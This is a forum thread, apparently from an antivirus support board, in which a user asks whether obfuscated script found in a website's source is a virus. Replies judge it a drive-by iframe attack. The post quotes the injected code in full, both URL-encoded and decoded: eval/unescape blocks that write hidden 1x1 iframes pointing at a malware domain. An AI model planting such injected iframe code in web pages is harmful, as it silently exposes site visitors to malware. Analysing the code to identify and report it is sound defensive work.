Virus Yes / No?

Avast let some viruses past, After i checked the website on a post for support on simplemachines.org (SMF).
I viewed the guys source and think i have found the “virus”.
I found:

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%34%32%30%38%37%33%34%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

Which was decoded to:

<script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?4208734" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn -->

and the website is:

hXXp://www.champions-side.com

Is that code the virus? Also add to avast database?

Hello,

According to VT, the site is being detected as a malware site by Firefox, Gdata, and Google safe browsing. According to what I know, Gdata uses bitdefender and avast engines, either one of them is detecting.

High possibility of it(site) serving iframe attack.

nmb

sedpoo.cXm is blacklisted on a few sites as hosting malware. Do i report it to them or thier host?

I guess, it(the site) is specially crafted for such attacks, so reporting it to anyone you mentioned might not help. The only way to not get infected is not visit the site.

nmb

Avast already alerts on that site, see image